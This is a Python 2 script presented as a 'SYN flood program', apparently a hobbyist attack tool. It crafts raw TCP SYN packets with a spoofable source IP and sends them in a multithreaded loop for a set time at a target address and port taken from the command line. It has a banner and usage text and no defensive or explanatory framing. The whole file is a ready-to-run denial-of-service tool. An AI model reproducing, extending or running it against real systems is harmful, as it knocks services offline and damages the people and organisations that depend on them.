'''
Syn flood program in python by Tequila/e
credits to Silver Moon for base's of syn packets.
r
s
s
y
n
'''
# some imports
import socket, sys, os
import threading
import time
import thread
from struct import *
if len(sys.argv) < 5:
print("Usage: python rssyn.py <source ip> <destination ip> <destination port> <amount of threads> <time>");
sys.exit();
# checksum functions needed for calculation checksum
def checksum(msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )
s = s + w
s = (s>>16) + (s & 0xffff);
#s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
#create a raw socket
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
except socket.error , msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + ' Message: ' + msg[1]
sys.exit()
# tell kernel not to put in headers, since we are providing it
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# now start constructing the packet
packet = '';
source_ip = sys.argv[1]
dest_ip = sys.argv[2] # or socket.gethostbyname('www.google.com')
threads = sys.argv[4]
run_time_in_seconds = sys.argv[5]
os.system('clear')
print "##"
print "# r #"
print "# s #"
print "# s #"
print "# y #"
print "# n #"
print "# Flood #"
print "# Made by e #"
print "##"
# ip header fields
ihl = 5
version = 4
tos = 0
tot_len = 20 + 20 # python seems to correctly fill the total length, dont know how ??
id = 54321 #Id of this packet
frag_off = 0
ttl = 255
protocol = socket.IPPROTO_TCP
check = 10 # python seems to correctly fill the checksum
saddr = socket.inet_aton ( source_ip ) #Spoof the source ip address if you want to
daddr = socket.inet_aton ( dest_ip )
ihl_version = (version << 4) + ihl
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ihl_version, tos, tot_len, id, frag_off, ttl, protocol, check, saddr, daddr)
# tcp header fields
source = 1234 # source port
dest = int(sys.argv[3]) # destination port
seq = 0
ack_seq = 0
doff = 5 #4 bit field, size of tcp header, 5 * 4 = 20 bytes
#tcp flags
fin = 0
syn = 1
rst = 0
psh = 0
ack = 0
urg = 0
window = socket.htons (5840) # maximum allowed window size
check = 0
urg_ptr = 0
offset_res = (doff << 4) + 0
tcp_flags = fin + (syn << 1) + (rst << 2) + (psh <<3) + (ack << 4) + (urg << 5)
# the ! in the pack format string means network order
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, check, urg_ptr)
# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol = socket.IPPROTO_TCP
tcp_length = len(tcp_header)
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , protocol , tcp_length);
psh = psh + tcp_header;
tcp_checksum = checksum(psh)
# make the tcp header again and fill the correct checksum
tcp_header = pack('!HHLLBBHHH' , source, dest, seq, ack_seq, offset_res, tcp_flags, window, tcp_checksum , urg_ptr)
# final full packet - syn packets dont have any data
packet = ip_header + tcp_header
#Send the packet finally - the port specified has no effect
print "Starting rssyn flood on " + str(dest_ip) + ":" + str(dest) + " from " + str(source_ip)
print "With " + str(threads) + " threads for " + str(run_time_in_seconds) + " seconds."
start_time = time.time()
global spawned_threads
spawned_threads = []
spawned = 0
total_packets = 0
def sendPackets():
while (time.time() - start_time) < int(run_time_in_seconds):
s.sendto(packet, (dest_ip , 0 ))
global total_packets
total_packets += 1
print str(total_packets) + " Packets sent to " + dest_ip + "\r\n"
while (spawned < int(threads)):
c = threading.Thread(target=sendPackets)
spawned_threads.append(c)
spawned += 1
for Threader in spawned_threads:
Threader.start()
print str(Threader) + " Started"
for Threads in spawned_threads:
Threads.join()
print "All threads have finished flooding for " + run_time_in_seconds + " seconds.."
print "Flood stopping.."
print "Shutting Down"
